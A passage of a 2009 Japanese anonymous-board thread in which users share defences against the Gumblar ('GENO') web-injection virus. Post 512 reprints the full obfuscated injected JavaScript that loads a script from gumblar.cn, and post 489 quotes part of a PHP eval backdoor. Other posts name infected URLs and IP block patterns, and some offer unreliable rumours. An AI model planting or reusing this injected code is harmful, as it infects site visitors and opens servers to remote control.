すまそ

451:名無しさん@お腹いっぱい。
09/05/16 10:37:48
これってCドライブのファイルしか書き換えないんなら外付けHDD買ったときに付いてきたHD革命でCドライブのバックアップイメージ作っといて
もし感染したらイメージ復元で戻せばとりあえず感染前には戻せるんだよね?
フラッシュとアクロバットリーダーは最新にしたけどPCに最初から入ってたバスターではダメっぽいしもうマジで怖いよorz

452:名無しさん@お腹いっぱい。
09/05/16 10:39:16
ちなみに 441 は

ドリームメールの 【P貯め~る】ってメールから
リンクされています。
アクセスすると2ポイント

なんです。

453:名無しさん@お腹いっぱい。
09/05/16 10:39:25
>>451
つシステムの復元

454:名無しさん@お腹いっぱい。
09/05/16 10:39:35
バスターでは他のウイルスでも駄目なの多いからな

455:名無しさん@お腹いっぱい。
09/05/16 10:39:54
相変わらずaguseは反応しない。

456:名無しさん@お腹いっぱい。
09/05/16 10:39:59
>>441
ソースに
(function(){var UkRR='%';var WdBp=('v&61r&20a以下略
と入って居ますね

457:名無しさん@お腹いっぱい。
09/05/16 10:40:14
>>441
責任もって削除以来してこい

458:名無しさん@お腹いっぱい。
09/05/16 10:40:28
Adobe Reader→環境設定→インターネット→PDFをブラウザに表示

PDFをブラウザに表示のチェックも外したほうがいいんじゃない?

459:名無しさん@お腹いっぱい。
09/05/16 10:40:57
メールからは感染しないんだよな?

460:名無しさん@お腹いっぱい。
09/05/16 10:41:44
HTMLメールに仕込めばいくらでも逝けるんじゃね?

461:名無しさん@お腹いっぱい。
09/05/16 10:42:00
>>458
だいぶ前からはずすように言われてるよ

462:名無しさん@お腹いっぱい。
09/05/16 10:46:45
よし、俺がとりあえず>>441にアクセスしてみる
仮想PCだし。画面キャプできたらどっかにうpしようかな

463:名無しさん@お腹いっぱい。
09/05/16 10:47:10
>>461
読み直したら・・・
Adobe Reader→環境設定→JavaScript→Acrobat javascriptを使用
を切るしか書いてなかった気がしたから( ̄▽ ̄;)

464:名無しさん@お腹いっぱい。
09/05/16 10:49:56
テンプレに反映出来てないんだろうな

465:名無しさん@お腹いっぱい。
09/05/16 10:50:11
>>463
もしかしたら前スレかもしれないけど両方はずとくといいって

466:名無しさん@お腹いっぱい。
09/05/16 10:51:51
>>462
ソースに情報が書き込まれてるって>>456でかいたんだが?

467:名無しさん@お腹いっぱい。
09/05/16 10:52:24
ほんとだこのスレには>>436しかないね

468:名無しさん@お腹いっぱい。
09/05/16 10:53:24
>>441
うぁぁぁぁぁぁ

469:名無しさん@お腹いっぱい。
09/05/16 10:53:43
>>466
いや、ただ試しに踏んでみたいだけ。

470:名無しさん@お腹いっぱい。
09/05/16 10:54:12
>>441
踏んじまっただろ!!責任取れ!!

471:463
09/05/16 10:54:37
一応、自分もこのウィルスの危機にあいかけたので
気づいたところは書きたいと思います

472:名無しさん@お腹いっぱい。
09/05/16 10:54:50
>>462
やめておいた方がいい
URLリンク(www.virustotal.com)

473:94 101 154
09/05/16 10:55:04
>>422
Firefox側にもIE側にもついてるよ。

ところで、例のサイトでブラックリストが更新されたみたい。
あくまで、身内の為のリストらしい(多分、あまり騒ぎ立てて欲しくないっぽい)
感染を全て確認したわけではないし、全ては自己責任の範囲で らしいが。
俺は今から登録する。


KIS8で質問している人は、デフォルトのまま次々進めてOK
モデム切った状態で、PCを再起動させて、ネットにつないだら、直ぐにパターンファイルを更新。
更新されたら、ネットから切断して、完全スキャンを高設定にして、完全スキャン。

474:名無しさん@お腹いっぱい。
09/05/16 10:55:35
>>471
えらい!

475:名無しさん@お腹いっぱい。
09/05/16 11:00:47
ああ、またカスペ同じ症状出てしまいましたorz
最初に保存する先がデスクトップに設定してしまってるみたいで
ファイル名がデスクトップって日本語が入るせいなんでしょうか。

476:名無しさん@お腹いっぱい。
09/05/16 11:01:15
最近頻発してるネトゲの垢ハックでもこのウイルスが疑われてるな

477:名無しさん@お腹いっぱい。
09/05/16 11:02:35
>>475
たぶん、日本語入ってないとこに移すの忘れずに

478:463 471
09/05/16 11:04:28
あとは・・・sqlsodbc.chmの場所ですが

Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411

のどちらかにあると思います

479:名無しさん@お腹いっぱい。
09/05/16 11:04:29
もうだめだ!!!!!!!!
インターネット閉鎖してください!!!!!!!!!!

480:名無しさん@お腹いっぱい。
09/05/16 11:04:31
>>476
垢ハックの主はzlkon.lvだったから、同じタイプという事で気を付けているのでは無いでしょうか。

481:名無しさん@お腹いっぱい。
09/05/16 11:06:20
まだやってんのかよ・・・。


482:名無しさん@お腹いっぱい。
09/05/16 11:06:41
macを確認したいのですがどうやって調べればいいのでしょうか?

483:名無しさん@お腹いっぱい。
09/05/16 11:06:46
>>470
www。livmail。com
(株) りぶメール
店舗連絡先: 0120-二五五-八八八

電凸よろ

484:名無しさん@お腹いっぱい。
09/05/16 11:06:58
インターネット閉鎖できませーん

485:名無しさん@お腹いっぱい。
09/05/16 11:08:01
>>479,484
笑わすなww

486:94 101 154
09/05/16 11:08:51
>>473
の>デフォルトのまま次々進めてOK
はインストールや再起動後でてくるウィザードの話ね。

>>472
ずっと気になっていたんだが、
これってどうやってスキャンさせてるの?

とりあえず、自分が使ってるセキュリティーソフトに不安な人は、
G-DATAの体験版あたりでしのぐのも手かも(その分重いけど)。
avast と BitDefender のデュアルエンジンだったはず。
URLリンク(www.junglejapan.com)
メール登録あり。

>>475
状況が分からん。
どこまではやったのか書いてくれ。
俺がやった時は、セットアップファイルのフォルダの場所を日本語を含まない場所に変更したら、大丈夫だったぞ。
解凍した時に自動で出来るフォルダも怪しいから、ドライブ直下に半角英数フォルダ作り直して、
解凍して出てきたファイルを移動させてみて。 

487:名無しさん@お腹いっぱい。
09/05/16 11:09:22
sqlsodbc.chmが見つからないと言ってる人は
ファイル検索ソフトでも使えば?
Everythingとかいろいろあるでしょ

488:名無しさん@お腹いっぱい。
09/05/16 11:10:14
これってファイルにも感染しますか?
大事なのを外付けに避難させてるんだけど、リカバリした後にファイルをパソコンに入れたらまた感染?

489:名無しさん@お腹いっぱい。
09/05/16 11:10:31
うちのサーバも書き換えられてたんで、いろいろファイル見てたんだがこんなのが見つかった
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode
から始まる、2450文字くらいあるんでここに書けないんで一部だけ。
FTPの情報によると5月8日に更新されたファイルのようだ
GENO関係ない?php使ってjavascript書かれてるんだが。unescapeとかも見える

どこかに全文貼ったほうがいい?詳しい人いる?

490:名無しさん@お腹いっぱい。
09/05/16 11:12:54
>>489
それアウトだな。

491:名無しさん@お腹いっぱい。
09/05/16 11:13:28
書こうと思ったらもう載ってた
URLリンク(www3.atword.jp)
緊急のとこね
>>441はmartuzに飛ばされるから

492:名無しさん@お腹いっぱい。
09/05/16 11:15:20
あの~、皆様にお尋ねしたいのですが、先日から私のPCにインストールしてある
adobe acrobat9.0が勝手に閉じてしまうのですが、原因わかる方おられないでしょうか?
ネットでいろいろ検索してみたところ、ここで「勝手に起動する」とありましたので、
何らかの関連性があると思いカキコしました。詳しく言うと、acrobatを起動して、数秒後
に勝手に閉じてしまいます。もしかしてこのGENOウィルスが原因なんでしょうか?
そもそもGENOウィルスって何ですか?もしそれが原因なら、対処方法はあるのですか?
素人で大変申し訳ありませんが、宜しくお願いします。

493:名無しさん@お腹いっぱい。
09/05/16 11:15:23
>>482
Vistaユーザーだからmacはわからないです><

494:名無しさん@お腹いっぱい。
09/05/16 11:17:06
>>492
まずはこのスレを最初から読もうね

495:名無しさん@お腹いっぱい。
09/05/16 11:19:13
>>489
それ・・・アウト。
どこかにgumblarとか書かれて無いかな?

496:名無しさん@お腹いっぱい。
09/05/16 11:20:09
質問スレって無いんだっけ
混在しちゃうと読みづらい

497:名無しさん@お腹いっぱい。
09/05/16 11:22:53
俺なんてTシャツ着て転げまわるから空拭きの雑巾要らない

498:名無しさん@お腹いっぱい。
09/05/16 11:24:45
Adobe Reader をアンスコすれば解決すんの?
使わないしイラネーな

499:489
09/05/16 11:25:00
>>490,495
今まで見たヤツはgumblarとか書いてあったがこれはない
base64でエンコードされてるからだけどね

500:名無しさん@お腹いっぱい。
09/05/16 11:25:50
>>498
フラッシュプレイヤーも

501:名無しさん@お腹いっぱい。
09/05/16 11:26:00
ちょ、なんだよ。前スレ落ちたな~なんて思って寝たら、もうこんなにスレ進んでんのかよ。

502:名無しさん@お腹いっぱい。
09/05/16 11:26:25
evalとunescapeの両方があったらほぼ確定じゃないかな

>>441
大当たり 比較的最近の型かな


503:名無しさん@お腹いっぱい。
09/05/16 11:27:53
それカスペでも反応する?

504:名無しさん@お腹いっぱい。
09/05/16 11:29:17
>>499
んじゃ>>491
martuzとかは?

505:94 101 154
09/05/16 11:29:56
>>491
Nice!



506:名無しさん@お腹いっぱい。
09/05/16 11:30:22
おもしれえなこのスレw

507:名無しさん@お腹いっぱい。
09/05/16 11:30:24
ちょっと何この速さ
いつの間に5いってんの・・・
バグ?だれか説明してくれ

508:名無しさん@お腹いっぱい。
09/05/16 11:31:44
PeerGurdianで、危険IP弾いてるんだけど
IP一覧みたいなまとめって、どこかあるんだっけ
94.247.2.195だけ?

509:名無しさん@お腹いっぱい。
09/05/16 11:31:50
Avira AntiVirを導入してるから安心してみておける

510:名無しさん@お腹いっぱい。
09/05/16 11:32:20
>>441
これ踏むとどうなるの?

511:名無しさん@お腹いっぱい。
09/05/16 11:32:38
勿論感染

512:改ざんされたソース
09/05/16 11:33:00
814 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 03:13:30
>>732 なるほど

恐らくこれだな

スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト


以上、前スレから転載
ドットがアンダーバーに変わっている亜種もあるっぽい

513:名無しさん@お腹いっぱい。
09/05/16 11:33:39
>>508
>>380

514:名無しさん@お腹いっぱい。
09/05/16 11:34:01
>>508
>>380

515:名無しさん@お腹いっぱい。
09/05/16 11:34:43
>>513
サンキュ、助かった

516:名無しさん@お腹いっぱい。
09/05/16 11:34:56
22秒撃ち負けたw

517:名無しさん@お腹いっぱい。
09/05/16 11:35:43
改竄が読めません!

518:名無しさん@お腹いっぱい。
09/05/16 11:35:47
Googleが実現させたシンプルで高機能なブラウザ
URLリンク(www.google.co.jp)

WindowsXPを利用の初心者はこのブラウザでOK!
感染したサイトや、危険なURLを開くとブラウザが危険を知らせてくれます。
Vistaでは埋め込まれたJSに反応しないため危険警告は出ずそのサイトが表示します。

上級者にはFirefoxの設定変更で回避する方法がおすすめです。

519:名無しさん@お腹いっぱい。
09/05/16 11:36:21
>>509
擦り抜けるつってんだろ

520:名無しさん@お腹いっぱい。
09/05/16 11:37:04
なんかもう順番に読んでくのメンドイ;;;
読むより早くスレが進んでいくよーT-T
こんなの実況スレ以来だよ―――っ。

521:名無しさん@お腹いっぱい。
09/05/16 11:37:13
avastが株上げたな
無料の分際でやるわねなんて思っていないんだからねっ

522:名無しさん@お腹いっぱい。
09/05/16 11:38:20
何で勢いこんなにあがったのかと思ったら同人サイトも改変されちゃったのね


523:名無しさん@お腹いっぱい。
09/05/16 11:38:24
同人スレのまとめの人も混乱してやがる\(^o^)/

524:名無しさん@お腹いっぱい。
09/05/16 11:38:41
感染サイト
hxxp://expss.main.jp/expss2/2005/07/

525:名無しさん@お腹いっぱい。
09/05/16 11:38:58
>>518
>上級者にはFirefoxの設定変更で回避する方法がおすすめです

詳しくお願い

526:名無しさん@お腹いっぱい。
09/05/16 11:40:53
URLリンク(www31.atwiki.jp)

同人板のまとめが分かり易いよ

527:名無しさん@お腹いっぱい。
09/05/16 11:41:39
今更だけどProxomitronでフィルタ作れば良くね

528:名無しさん@お腹いっぱい。
09/05/16 11:42:45
>>520
すげえきもい
才能あるなおまえ

529:489
09/05/16 11:42:59
evalとunescape両方あるね
FFFTPからそのphpファイルをTeraPadで開こうとするとAVGが反応する
ローカルにダウンロードしてから開くと反応しない、設定の問題か。
「ウイルス JS/Downloader.Agentが特定されました」って出るね

530:名無しさん@お腹いっぱい。
09/05/16 11:43:18
BSODってなに?

531:名無しさん@お腹いっぱい。
09/05/16 11:43:44
>>521
対応早いのはユーザーの多さじゃないか?

532:名無しさん@お腹いっぱい。
09/05/16 11:44:03
>このウィルスはKasperskyかニフティオンラインスキャン、avast!、ウイルスバスタ2009でしか今現在、検索できないウィルスです

バスター2007、2008はだめなのか?

533:名無しさん@お腹いっぱい。
09/05/16 11:45:00
>>525
URLリンク(www31.atwiki.jp)
とりあえずここを参照

534:名無しさん@お腹いっぱい。
09/05/16 11:45:25
なんでGENOウイルスなの?GENOは被害者じゃないの?

535:名無しさん@お腹いっぱい。
09/05/16 11:45:50
やられた。同人サイトなんて見てないしgumblarに飛ばされたこともない。
怪しいexe実行した覚えもないしどこから感染したのか…。


536:名無しさん@お腹いっぱい。
09/05/16 11:46:19
>>534
もはや、加害者だろ

537:名無しさん@お腹いっぱい。
09/05/16 11:46:21
>>524
うわ。徹底的にやられてるね。
(function(TitRT)
(function(j4A)
(function(x5E)

とか、計24個貼ってある。

538:名無しさん@お腹いっぱい。
09/05/16 11:46:25
md5+それ以外のハッシュも求めるならAXHashTransおぬぬめ
URLリンク(www.vector.co.jp)

539:名無しさん@お腹いっぱい。
09/05/16 11:46:27
>>525
使用ブラウザをFirefoxに変更、アドオンにNoScriptを入れる

540:名無しさん@お腹いっぱい。
09/05/16 11:46:37
>>530
ブルースクリーンとは 【blue screen】 - 意味・解説 : IT用語辞典
URLリンク(e-words.jp)

541:名無しさん@お腹いっぱい。
09/05/16 11:46:41
ウイルスバスター2009対応してないんじゃないの

542:名無しさん@お腹いっぱい。
09/05/16 11:46:46
>>507
同人関係で大量の個人サイト感染発覚→パニック&祭り

543:名無しさん@お腹いっぱい。
09/05/16 11:46:54
>>532
むしろウイルスバスタ2009平気ってほんとなのか

544:名無しさん@お腹いっぱい。
09/05/16 11:46:56
>>534
被害者っちゃあ被害者だけど
真っ先に発覚したにも関わらず放置した期間が長かったし

545:名無しさん@お腹いっぱい。
09/05/16 11:46:57
>>532
2009はついこの間更新されて検出出来るようになったみたいですね~

2009に換えろということかも・・・?w

546:名無しさん@お腹いっぱい。
09/05/16 11:47:24
>>518
Genoウイルスが変化したらChromeは直ぐに対応するのかな

547:名無しさん@お腹いっぱい。
09/05/16 11:47:33
>>534
爆発的に感染者を増やした上
対応がお粗末だったから皮肉を込めてそう呼ばれてる

548:名無しさん@お腹いっぱい。
09/05/16 11:48:54
バスターのGENOME.BK って
誤検出じゃないの?
それとは違うくて?

549:名無しさん@お腹いっぱい。
09/05/16 11:48:58
>>545
亜種まで検出してんの?

550:名無しさん@お腹いっぱい。
09/05/16 11:49:08
そして週末土日で対応遅れるだろうし
もうどこのサイトも信用できない((((;゚Д゚))))

551:名無しさん@お腹いっぱい。
09/05/16 11:49:14
>>533
>>539
ありがと

552:名無しさん@お腹いっぱい。
09/05/16 11:49:37
てかウイルス仕掛けたり作ったりしてるの日本人なの?

553:名無しさん@お腹いっぱい。
09/05/16 11:49:39
534の人気に嫉妬

554:名無しさん@お腹いっぱい。
09/05/16 11:50:24
㌧フル初の感染者確認!

555:名無しさん@お腹いっぱい。
09/05/16 11:50:35
なんぼ週アスと手を組んで安売りセールやってももうGENOのサイト見に行きたくねえ
一度もないけど

556:名無しさん@お腹いっぱい。
09/05/16 11:51:13
HashTab Shell Extension お薦め
URLリンク(www.forest.impress.co.jp)


557:名無しさん@お腹いっぱい。
09/05/16 11:51:28
>>553
genoの社員じゃねーのw

558:名無しさん@お腹いっぱい。
09/05/16 11:51:31
>>545
いやこの間の更新には入ってない

559:名無しさん@お腹いっぱい。
09/05/16 11:51:34
やべぇ。神戸で豚感染、国内初だって。
もう、何もかも終わった。

560:名無しさん@お腹いっぱい。
09/05/16 11:51:47
hxxp://www.livmail.com/3others-page/janet/tokusen/index.htm
見てきた、しっかりscript埋め込まれてる罠
<script language=javascript><!--
(function(){var UkRR='%';var WdBp=('v&61r&2・・・・・・・・・

561:名無しさん@お腹いっぱい。
09/05/16 11:51:54
リアルでも感染確定\(^o^)/

562:名無しさん@お腹いっぱい。
09/05/16 11:52:01
VISTAなら大丈夫って本当?
HPだけど、4月7日に踏んだときに謎のCPU使用率UP現象があったんだけど。
再起動したら起動できなくなるとかはなかったけど。

563:名無しさん@お腹いっぱい。
09/05/16 11:52:19
>>555
お気に入りから消した
対策してあるけどさすがにカード使う気にも
住所入れる気にもならないな・・・

それでも安売りメール送ってくる
解除したいけどサイト踏みたくないw

564:名無しさん@お腹いっぱい。
09/05/16 11:52:25
豚インフルきちゃったな

565:名無しさん@お腹いっぱい。
09/05/16 11:53:03
>>518
XPにそれインストールして>>524を開いたら、真っ赤になった!
まじ、やべーよ!!

566:名無しさん@お腹いっぱい。
09/05/16 11:53:02
さっきGENOにアクセスしたらつながらなかったんだけど大丈夫かな
こわいなぁ

567:名無しさん@お腹いっぱい。
09/05/16 11:53:04
>>549
亜種までかはわからないけど・・・

568:名無しさん@お腹いっぱい。
09/05/16 11:53:23
タイミングも悪いよなー
豚インフル来ちゃったし、これで余計にマスコミに取り上げられる機会が…orz

569:名無しさん@お腹いっぱい。
09/05/16 11:53:56
524踏んじゃったけど大丈夫…?

570:名無しさん@お腹いっぱい。
09/05/16 11:54:30
踏んじゃったけど大丈夫?って聞くなら最初から踏むなよ

571:名無しさん@お腹いっぱい。
09/05/16 11:55:02
>>539の対処でNoScript入れても許可してるサイトが感染してたら意味ないよな?
最近youtubeやニコ動ですら怖くなってるわ

572:名無しさん@お腹いっぱい。
09/05/16 11:55:05
神戸在住の俺\(^o^)/ オワタ

573:名無しさん@お腹いっぱい。
09/05/16 11:55:07
>>569
だめ

574:名無しさん@お腹いっぱい。
09/05/16 11:55:10
>>568
マスゴミだってPCつかってるから自分が感染すれば注目してくれるかもよ

575:名無しさん@お腹いっぱい。
09/05/16 11:55:15
豚インフルの感染者って地元なんだよね・・・

576:名無しさん@お腹いっぱい。
09/05/16 11:55:15
877 名前: geno [sage] 投稿日: 2009/05/16(土) 11:50:08 ID:bcj3KvYq0
これかわからないけど東方の超大手サイトからavast!でウイルス反応出るんだが
東方自ジャンルじゃないからどのスレいけばいいのかよくわかんね…
とりあえずサイト管理人にメールするしか出来ないのかね
こういうときは



これは・・・

577:名無しさん@お腹いっぱい。
09/05/16 11:55:31
>>524
> 感染サイト
> hxxp://expss.main.jp/expss2/2005/07/
ここも
function(TitRT){var H5h='%';var B4mN=('.76ar.20a.3d.22



578:名無しさん@お腹いっぱい。
09/05/16 11:55:57
リアルでもネットでもウィルス流行wwww
何事だよ

579:名無しさん@お腹いっぱい。
09/05/16 11:56:18
某サイトで見たんですがfirefoxの
Adblock Plusのフィルタリストに

*/94.247.[2-3].[0-255]/*
*/94.229.[64-65].[0-255]/*

を追加するのは効果あるんですか?

580:名無しさん@お腹いっぱい。
09/05/16 11:56:36
524は感染サイトを紹介しているまとめサイトだと思って踏んじゃったんだよー

581:名無しさん@お腹いっぱい。
09/05/16 11:56:59
>>562
VISTAでも多分ヤバイ

582:名無しさん@お腹いっぱい。
09/05/16 11:57:01
>>549
亜種は検出しないよ

583:名無しさん@お腹いっぱい。
09/05/16 11:57:09
>>569
狐かchromeで見たの?
あとテンプレの通りに確認してみ?
念のためにavastさんでチェックな
最後に神社でお百度参りするんだ

584:名無しさん@お腹いっぱい。
09/05/16 11:58:21
VISTAって、今のところままだ感染報告来てないよな?
これから亜種が出てくるだろうが


ま、俺のところ98なんで関係ないんですがね

585:名無しさん@お腹いっぱい。
09/05/16 11:58:25
>>581
マジか。
まぁ、今はクリーンインスコして快適にはなったんだけどね。
色々なとこで「VISTAなら大丈夫」とか言ってるのはなんなんだろ

586:名無しさん@お腹いっぱい。
09/05/16 11:59:04
おい、VISTAもあぶないのかよ。ほんまかいな。どうなってんだよ

587:名無しさん@お腹いっぱい。
09/05/16 11:59:50
しかけてる奴もvista大丈夫大丈夫言われるとやりたくなっちゃうだろ

588:名無しさん@お腹いっぱい。
09/05/16 12:00:00
524はあぼーん推奨だろ

589:名無しさん@お腹いっぱい。
09/05/16 12:00:34
東方同人サイト超大手、感染報告来たね

これはニコオタ全滅フラグ

590:名無しさん@お腹いっぱい。
09/05/16 12:01:14
Vistaでも感染シマス

591:名無しさん@お腹いっぱい。
09/05/16 12:01:15
>>546
Google次第だろうな

592:名無しさん@お腹いっぱい。
09/05/16 12:01:31
>>519
工エエェェ(´д`)ェェエエ工工
ああああああああああああああああああああああああああああああああああ

593:名無しさん@お腹いっぱい。
09/05/16 12:02:12
熱い展開になってきたな

594:名無しさん@お腹いっぱい。
09/05/16 12:02:29
>>585
過去ログによると
GENOのサイトがお詫び文だか弁明ページだかで
そういうデマを流したらしい。

595:名無しさん@お腹いっぱい。
09/05/16 12:02:45
>>487
Meの場合、そもそも存在しないんでは?

596:名無しさん@お腹いっぱい。
09/05/16 12:02:46
これは日本\(^o^)/

597:594
09/05/16 12:03:36
違うわ思い違いだわ。
寝惚けてるので落ちるゴメン

598:名無しさん@お腹いっぱい。
09/05/16 12:04:08
>>533
そのリンク先、
疑わしきURLはクリックしなければ、大丈夫って受け取るヤツがいそう。
全て対策したうえで、かつ 疑わしきリンクをクリックしない にしてほしいな。


あと、次スレのテンプレでは そろそろ >>2は止めたほうがイイと思う。
もう、対策されたReaderが出ているんだし。
やむを得ず 古いバージョン(9.1以前)を使う状況にいるヤツは こんなスレに来ないはず。
全員アップデートしろ! だが、また脆弱性みつかるかもしれないから、JavaScript切っておけ でよかろうよ。

FirefoxにNoScript入れて、なおかつプラグインを全部切った方がいいよ。
NoScriptは初期設定がどうだったか忘れたけど、トップサイトは許可とかいう「ザル化設定」が沢山あるから。
Flashみられなくたって、PDFがブラウザで読めなくたって、いつ来るか分からない新型亜種に感染するよりいいだろ。

599:名無しさん@お腹いっぱい。
09/05/16 12:04:16
これはひどいなw

URLリンク(detail.chiebukuro.yahoo.co.jp)

600:名無しさん@お腹いっぱい。
09/05/16 12:04:42
Win系なら全部やばいって事でいいだろ
用心に越した事はないぞ?

601:名無しさん@お腹いっぱい。
09/05/16 12:04:46
怪しいサイトはjavascriptを無効にして踏むこと

602:名無しさん@お腹いっぱい。
09/05/16 12:05:25
>>600
つまり、Linuxにしろと?

603:名無しさん@お腹いっぱい。
09/05/16 12:05:28
とりあえず、面白半分で危険なサイトのURL(に近い)を貼るのは止めにしません?

ウィルス貼ってるのと同じようなものだし、
今から知識を得て対策しようとしてる人がカワイソだよ

604:名無しさん@お腹いっぱい。
09/05/16 12:05:30
>>596
なあにが日本万歳だこの糞野郎

605:名無しさん@お腹いっぱい。
09/05/16 12:05:36
avastがうるせーと思ったけど、調べてみたらなるほど。やるじゃん
いつもJS切ってるから大丈夫だったけど、警告はされるのね

606:名無しさん@お腹いっぱい。
09/05/16 12:06:04
>>565
オイラもXPだから入れてやってみよう

607:名無しさん@お腹いっぱい。
09/05/16 12:06:12
>>592
少なくとも改竄されたhtml踏んでも反応はしないし、恐らくだがpdf読み込んだ後も反応しなかった。
その時のウイルス自体には対応しただろうけど、htmlの改竄が見抜けない以上、すり抜けは続くんじゃないかな。
まあ無料版の8 Personalってのもあると思うけど。

608:名無しさん@お腹いっぱい。
09/05/16 12:06:33
この板だとネタなのかマジレスなのか分からん奴多いんだよな

609:名無しさん@お腹いっぱい。
09/05/16 12:06:47
>>602
そのうちMACとか全部に感染する亜種がでるかもな

610:名無しさん@お腹いっぱい。
09/05/16 12:07:59
>>599
ワロタwww
Genoウィルスが問題ないってw

611:名無しさん@お腹いっぱい。
09/05/16 12:08:00
Googleでも感染するってある意味最強じゃね?

612:名無しさん@お腹いっぱい。
09/05/16 12:08:31
URLリンク(www.virustotal.com)
URLリンク(www.virscan.org)

613:名無しさん@お腹いっぱい。
09/05/16 12:09:12
>>611
グーグルのサーバーにも感染してるの?
ってことは、ググったらアウト?

614:600
09/05/16 12:09:13
>>602
踏んでしまったのですが、○○ですが大丈夫でしょうか?(○○はOS)
って質問するよりログ読んだ方が速いだろと

615:名無しさん@お腹いっぱい。
09/05/16 12:09:14
ぐぐってリンク開かなければ大丈夫なんじゃなくて
検索使うだけでアウアウ?

616:名無しさん@お腹いっぱい。
09/05/16 12:10:43
>>524のサイトは難読化されたコードが24個も埋め込まれているw

617:名無しさん@お腹いっぱい。
09/05/16 12:10:49
俺のブラウザOPERAなんだけど…firefoxみたいに対策できないの?

618:名無しさん@お腹いっぱい。
09/05/16 12:11:54
凄いアホな質問していいか?
サイトでの感染があるのは分かったけど、感染したパソコンから送られた『メール』で
感染する可能性は?

619:名無しさん@お腹いっぱい。
09/05/16 12:11:57
Lunascapeのscript、Java無効設定じゃ危ない?

620:名無しさん@お腹いっぱい。
09/05/16 12:12:05
>>603
みんなネットサーフィンで知らずに踏んでると思われ

621:名無しさん@お腹いっぱい。
09/05/16 12:12:06
【新型インフル】 "ついに発生" 渡航歴ない高校生、新型インフルエンザと確定。どうやって感染?…他に17人の体調不良者も
スレリンク(newsplus板)

622:名無しさん@お腹いっぱい。
09/05/16 12:12:11
>>607
地道にNoScriptでがんばろうと思います。

623:名無しさん@お腹いっぱい。
09/05/16 12:12:09
最初に作った犯人を逮捕することはできないの?
その犯人に拡大の仕組みを自白させれば解決するんじゃないの?

624:名無しさん@お腹いっぱい。
09/05/16 12:12:16
>>617
F12キー押してJavaScriptとプラグインのチェックを外せばおk

625:名無しさん@お腹いっぱい。
09/05/16 12:13:05
このウイルスは広める能力はないから

626:名無しさん@お腹いっぱい。
09/05/16 12:13:21
>>620
普通に法律の解説サイトとかにウイルス紛れ込んでいるからな・・・
アダルトサイトとか違法DLサイトなら分かるんだが・・・

627:名無しさん@お腹いっぱい。
09/05/16 12:14:18
>>624
それだと安心できるな
しかしインターネットがつまらないものになりそうだ

628:名無しさん@お腹いっぱい。
09/05/16 12:14:47
>>623
東欧とかロシアとか中国じゃないのか?本拠地は
そいつらをすぐに逮捕できると思うか?

629:名無しさん@お腹いっぱい。
09/05/16 12:15:12
524のサイト
gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。このウェブサイトにアクセスすると
コンピュータに損害を与える可能性があります。

5397 個のドメインを感染させています。

増えてる ((;゜Д゜)ガクガクブルブル


630:名無しさん@お腹いっぱい。
09/05/16 12:15:25
国家が匿うな

631:名無しさん@お腹いっぱい。
09/05/16 12:15:29
XPなんだけど、sqlsodbc.chmのサイズが変。ハッシュもあわなかった。
cmd、regedit、再起動することはできる

ニフティのスキャンは、ロックのかかったファイルがいっぱい出てきた以外には、何もでなかった

sqlsodbc.chmのフォルダが圧縮されてる(青文字で表示されてる)のは何か関係ある?
それとも亜種なだけ?

632:名無しさん@お腹いっぱい。
09/05/16 12:15:34
NoScriptでGoogle開いてもJS禁止されてるね
Googleが危険なサイトだとみなされている翔子です

633:名無しさん@お腹いっぱい。
09/05/16 12:15:52
>>624
やってくる
ありがとう!

634:名無しさん@お腹いっぱい。
09/05/16 12:15:59
>>627
サイトごとの編集を使うってのあるが、結局許可したサイトが汚染されたら意味無し
まあ俺はyoutubeとかを許可しているけど

635:名無しさん@お腹いっぱい。
09/05/16 12:16:25
俺のPCにはsqlsodbc.chmが存在しないからかなり楽観視してるけど
そんなの関係ねえのかな?

636:名無しさん@お腹いっぱい。
09/05/16 12:18:03
>>635
>>4
>※sqlsodbc.chmを使わない亜種の存在が確認されていますので、
>この方法に完全に頼るのは危険かもしれません。

637:名無しさん@お腹いっぱい。
09/05/16 12:18:31
